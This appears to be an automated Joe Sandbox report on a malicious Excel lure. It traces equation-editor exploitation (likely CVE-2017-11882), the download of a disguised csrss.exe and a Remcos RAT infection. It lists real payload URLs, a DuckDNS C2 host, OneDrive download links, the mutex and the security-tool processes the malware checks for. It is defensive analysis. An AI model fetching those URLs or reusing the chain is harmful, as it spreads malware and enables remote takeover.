                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: EnumSystemLocalesW,8_2_33D91F50
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_33D92610
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoW,8_2_33D92543
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_33D91CD8
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: EnumSystemLocalesW,8_2_33D88404
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_33D9243C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoA,8_2_33D4F8D1
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,11_2_02C8D754
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,11_2_02C75A78
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,11_2_02C8D754
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: GetLocaleInfoA,11_2_02C7A788
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: GetLocaleInfoA,11_2_02C7A73C
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,11_2_02C944DE
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,11_2_02C75B84
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D88957 GetSystemTimeAsFileTime,8_2_33D88957
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5B60D GetComputerNameExW,GetUserNameW,8_2_33D5B60D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D89365 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_33D89365
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C7B704 GetVersionExA,11_2_02C7B704
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\notes\logs.dat, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Source: C:\Users\user\AppData\Roaming\csrss.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-9VASLDJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-9VASLDJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-9VASLDJump to behavior
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\notes\logs.dat, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  1
                  Valid Accounts
                  12
                  Native API
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  211
                  Input Capture
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  13
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Valid Accounts
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol211
                  Input Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Valid Accounts
                  11
                  Access Token Manipulation
                  21
                  Obfuscated Files or Information
                  Security Account Manager1
                  System Service Discovery
                  SMB/Windows Admin Shares2
                  Clipboard Data
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Windows Service
                  1
                  Windows Service
                  1
                  Install Root Certificate
                  NTDS1
                  System Network Connections Discovery
                  Distributed Component Object ModelInput Capture1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Registry Run Keys / Startup Folder
                  12
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  File and Directory Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Registry Run Keys / Startup Folder
                  21
                  Masquerading
                  Cached Domain Credentials36
                  System Information Discovery
                  VNCGUI Input Capture223
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Valid Accounts
                  DCSync1
                  Query Registry
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc Filesystem25
                  Security Software Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadow2
                  Virtualization/Sandbox Evasion
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                  Access Token Manipulation
                  Network Sniffing2
                  Process Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                  Process Injection
                  Input Capture1
                  Application Window Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                  System Owner/User Discovery
                  Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd TimersCommand ObfuscationGUI Input Capture1
                  Remote System Discovery
                  Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446719 Sample: Home Purchase Contract and ... Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 60 qr-in.com 2->60 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 22 other signatures 2->72 8 EXCEL.EXE 59 47 2->8         started        12 Efftwcmk.PIF 2->12         started        15 Efftwcmk.PIF 2->15         started        signatures3 process4 dnsIp5 62 94.156.67.72, 49162, 49166, 49168 TERASYST-ASBG Bulgaria 8->62 64 qr-in.com 188.114.96.3, 49161, 49163, 49164 CLOUDFLARENETUS European Union 8->64 50 lionsaretotalcontr...ejunglelions[1].doc, ISO-8859 8->50 dropped 17 csrss.exe 4 15 8->17         started        22 WINWORD.EXE 337 39 8->22         started        96 Multi AV Scanner detection for dropped file 12->96 98 Detected Remcos RAT 12->98 100 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->100 102 Contains functionality to detect sleep reduction / modifications 12->102 file6 signatures7 process8 dnsIp9 52 wwsaer.duckdns.org 17->52 54 wwsaer.duckdns.org 91.92.251.26, 49173, 8533 THEZONEBG Bulgaria 17->54 58 8 other IPs or domains 17->58 30 C:\Users\Public\Librariesfftwcmk, data 17->30 dropped 32 C:\Users\Publicfftwcmk.url, MS 17->32 dropped 34 C:\ProgramData\notes\logs.dat, data 17->34 dropped 74 Multi AV Scanner detection for dropped file 17->74 76 Detected Remcos RAT 17->76 78 Installs new ROOT certificates 17->78 88 4 other signatures 17->88 24 extrac32.exe 1 17->24         started        56 qr-in.com 22->56 36 C:\Users\user\AppData\...\qr-in.com.url, MS 22->36 dropped 38 C:\Users\user\AppData\Roaming\...38AvSGzZ.url, MS 22->38 dropped 40 ~WRF{618DEECE-5CD1...8-87A2956FA503}.tmp, Composite 22->40 dropped 42 C:\Users\user\AppData\Local\...\398EA60A.doc, ISO-8859 22->42 dropped 80 Microsoft Office launches external ms-search protocol handler (WebDAV) 22->80 82 Office viewer loads remote template 22->82 84 Microsoft Office drops suspicious files 22->84 28 EQNEDT32.EXE 12 22->28         started        file10 86 Uses dynamic DNS services 52->86 signatures11 process12 file13 44 C:\Users\Public\Librariesfftwcmk.PIF, PE32 24->44 dropped 90 Drops PE files with a suspicious file extension 24->90 46 C:\Users\user\AppData\Roaming\csrss.exe, PE32 28->46 dropped 48 C:\Users\user\AppData\Local\...\csrss[1].exe, PE32 28->48 dropped 92 Office equation editor establishes network connection 28->92 94 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 28->94 signatures14

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Home Purchase Contract and Property Details.xls11%ReversingLabsDocument-Excel.Trojan.Heuristic
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc100%AviraHEUR/Rtf.Malformed
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp100%AviraEXP/CVE-2017-11882.Gen
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc100%AviraHEUR/Rtf.Malformed
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe21%ReversingLabs
                  C:\Users\user\AppData\Roaming\csrss.exe21%ReversingLabs
                  C:\Users\Public\Libraries\Efftwcmk.PIF21%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                  http://geoplugin.net/json.gp100%URL Reputationphishing
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://geoplugin.net/json.gp/C100%URL Reputationphishing
                  http://www.day.com/dam/1.00%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  http://www.pmail.com0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://ocsp.sectigo.com0C0%URL Reputationsafe
                  https://f3rtrw.bl.files.1drv.com/y4mx_vDnHSZNTOhTMVLVmQRlGEek-eb6UO4R5ONQLcqQVc4RctseT_K1ezCYuH-Cc-_0%Avira URL Cloudsafe
                  http://94.156.67.72/4020/csrss.exej0%Avira URL Cloudsafe
                  http://qr-in.com/NAvSGzZ0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpt0%Avira URL Cloudsafe
                  https://live.com/0%Avira URL Cloudsafe
                  https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo0%Avira URL Cloudsafe
                  https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMc0%Avira URL Cloudsafe
                  wwsaer.duckdns.org0%Avira URL Cloudsafe
                  http://94.156.67.72/4020/csrss.exejjC:0%Avira URL Cloudsafe
                  http://94.156.67.72/4020/csrss.exe0%Avira URL Cloudsafe
                  http://qr-in.com/0%Avira URL Cloudsafe
                  https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=0%Avira URL Cloudsafe
                  http://qr-in.com/NAvSGzZyX0%Avira URL Cloudsafe
                  https://onedrive.live.com/downlo0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  qr-in.com
                  188.114.96.3
                  truetrue
                    unknown
                    dual-spov-0006.spov-msedge.net
                    13.107.137.11
                    truefalse
                      unknown
                      geoplugin.net
                      178.237.33.50
                      truefalse
                        unknown
                        wwsaer.duckdns.org
                        91.92.251.26
                        truetrue
                          unknown
                          dual-spov-0006.spov-dc-msedge.net
                          150.171.41.11
                          truefalse
                            unknown
                            onedrive.live.com
                            unknown
                            unknowntrue
                              unknown
                              f3rtrw.bl.files.1drv.com
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                wwsaer.duckdns.orgtrue
                                • Avira URL Cloud: safe
                                unknown
                                http://qr-in.com/NAvSGzZfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://geoplugin.net/json.gptrue
                                • URL Reputation: phishing
                                unknown
                                http://94.156.67.72/4020/csrss.exetrue
                                • Avira URL Cloud: safe
                                unknown
                                https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogotrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://94.156.67.72/4020/csrss.exejjC:EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://sectigo.com/CPS0csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://94.156.67.72/4020/csrss.exejEQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.entrust.net/server1.crl0csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://ocsp.sectigo.com0csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://ocsp.entrust.net03csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://geoplugin.net/json.gptcsrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.diginotar.nl/cps/pkioverheid0csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://f3rtrw.bl.files.1drv.com/y4mx_vDnHSZNTOhTMVLVmQRlGEek-eb6UO4R5ONQLcqQVc4RctseT_K1ezCYuH-Cc-_csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMccsrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://geoplugin.net/json.gp/Ccsrss.exe, 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmptrue
                                • URL Reputation: phishing
                                unknown
                                http://www.day.com/dam/1.0Home Purchase Contract and Property Details.xls, ~DF5534031E748409A6.TMP.0.dr, 31682C44.png.0.dr, ~DF78F515A159E2AA69.TMP.0.dr, 0B430000.0.dr, DF465E1C.emf.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://live.com/csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://qr-in.com/qr-in.com.url.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ocsp.entrust.net0Dcsrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://qr-in.com/NAvSGzZyX~DF5534031E748409A6.TMP.0.dr, 0B430000.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://secure.comodo.com/CPS0csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.pmail.comEfftwcmk.PIF, Efftwcmk.PIF, 0000000B.00000002.464066991.0000000001E92000.00000004.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474420464.000000007EDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.entrust.net/2048ca.crl0csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://ocsp.sectigo.com0Ccsrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://onedrive.live.com/downlocsrss.exe, 00000008.00000002.1011774881.000000003287D000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=csrss.exe, 00000008.00000002.1011774881.0000000032868000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                150.171.41.11
                                dual-spov-0006.spov-dc-msedge.netUnited States
                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                13.107.137.11
                                dual-spov-0006.spov-msedge.netUnited States
                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                91.92.251.26
                                wwsaer.duckdns.orgBulgaria
                                34368THEZONEBGtrue
                                188.114.96.3
                                qr-in.comEuropean Union
                                13335CLOUDFLARENETUStrue
                                94.156.67.72
                                unknownBulgaria
                                31420TERASYST-ASBGtrue
                                178.237.33.50
                                geoplugin.netNetherlands
                                8455ATOM86-ASATOM86NLfalse
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1446719
                                Start date and time:2024-05-23 20:19:42 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 12m 11s
